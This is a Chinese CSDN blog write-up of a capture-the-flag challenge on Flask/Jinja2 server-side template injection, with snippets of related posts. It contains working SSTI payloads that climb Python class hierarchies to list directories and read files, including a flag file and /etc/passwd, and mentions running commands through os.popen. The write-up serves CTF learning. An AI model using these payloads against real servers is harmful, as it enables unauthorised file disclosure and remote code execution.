Web_python_template_injection攻防世界ctf web

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量1.3k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45689999/article/details/104625990
版权

Web_python_template_injection

flask是使用Jinja2来作为渲染引擎的。看例子
在网站的根目录下新建templates文件夹,这里是用来存放html文件。也就是模板文件。

看到template injection可以猜到是SSTI(Server-Side Template Injection) 服务端模板注入
{{}}在Jinja2中作为变量包裹标识符,所以在{{}}里面的内容会被当做变量,并并执行。

1.检验是否为SSTI

http://111.198.29.45:44517/{{7*5}} //无论什么乘什么都可以

在这里插入图片描述
执行了{{}}里面的内容,即存在SSTI

2.读取文件
在这里插入图片描述
1)

http://111.198.29.45:44517/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

因为是做题,确认了是SSTI,执行以上命令,查看一级目录 ’ . ’ ,得到
在这里插入图片描述
2)读取fl4g文件

http://111.198.29.45:44517/%7B%7B''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()%7D%7D

得到flag

参考两篇bPython——flask漏洞探究的blog
https://www.cnblogs.com/Rasang/p/12181654.html
https://www.freebuf.com/column/187845.html

开往宇宙尽头
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 995
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
[wp] Web_python_template_injection 攻防世界
夏日 の blog
02-06 1320
打开题目我们看到 提示python模板注入,尝试{{1+1}}看看{{}}是否被执行 由上图可知代码被执行确实存在模板注入 1.查看所有子类 {{[].__class__.__base__.__subclasses__()}} ...
python template injection_月末总结(python模板注入)
weixin_35786588的博客
01-13 339
什么是模板:模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。模板引擎通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。如果攻击者能够控制要呈现的模板,则他们将能够注入可暴露上下文数据,甚至在服务器上运行任意命令的表达式。flask:Flask是一个使用 Python 编写的轻量级 Web ...
攻防世界Web_python_template_injection
最新发布
2302_79800344的博客
04-01 819
【代码】【攻防世界Web_python_template_injection
Web_python_flask_sql_injection(攻防世界web
weixin_43610673的博客
07-21 1112
目录/index路由/login路由/register路由/edit_profile路由 主要功能就是登陆注册,修改个人信息,能留言 然后可以关注别人 下载附件审计,先看路由 route.py /index路由 不存在过滤 关键是结果直接回显 追踪到Others.py的Add函数 a’,‘1’,‘2020-7-20’),(Null,(select database()),‘1’,‘2020-7-20’)# 最终Payload: a’,‘1’,‘2020-7-20’),(Null,(select fla
攻防世界 WEB Web_python_flask_sql_injection
qq_41696858的博客
12-13 875
没啥好说的,题目已经把几个关键点给出来了,flask,sql注入,还给了源码 那么就是源码审计,这题sql注入的点属实是有点多,普通的也有,难的也有,也难怪他是个九分题 干就完了,下载源码,第一个注入点是routes.py里面的index路由项 res = mysql.Add("post", ['NULL', "'%s'" % form.post.data, "'%s'" % current_user.id, "'%s'" % now()])
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1324
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。技术栈python3.6 + Django 2.1.7 + 10.3.9-MariaDB or Mysql-8.0 + REST Framework 3.9.2 + xadmin + Celery + Vue部署基于ubuntu 18 ...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf_web_kmipn
05-06
用户用户密码 Sandiuser Sandiuser
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6608
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
攻防世界XCTFWeb_python_template_injection
末初的CSDN博客
03-13 758
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...
CTF模板注入
weixin_43952190的博客
07-30 4173
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
python web开发-flask中使用sqlalchemy
挨踢学霸
03-28 4491
SqlAlchemy是一个python的ORM框架。在flask中有一个flask-sqlalchemy的扩展,使用起来很方便。1.       创建一个sqlalchemy的Model模块创建一个models.py的模块创建model的时候,首先引入flask-sqlalchemy的扩展from flask import Flaskfrom flask_sqlalchemy import SQL...
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6797
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
CG CTF WEB SQL Injection
无限迭代中......
07-04 616
http://chinalover.sinaapp.com/web15/index.php 题解: <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ ...
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5725
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入。
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值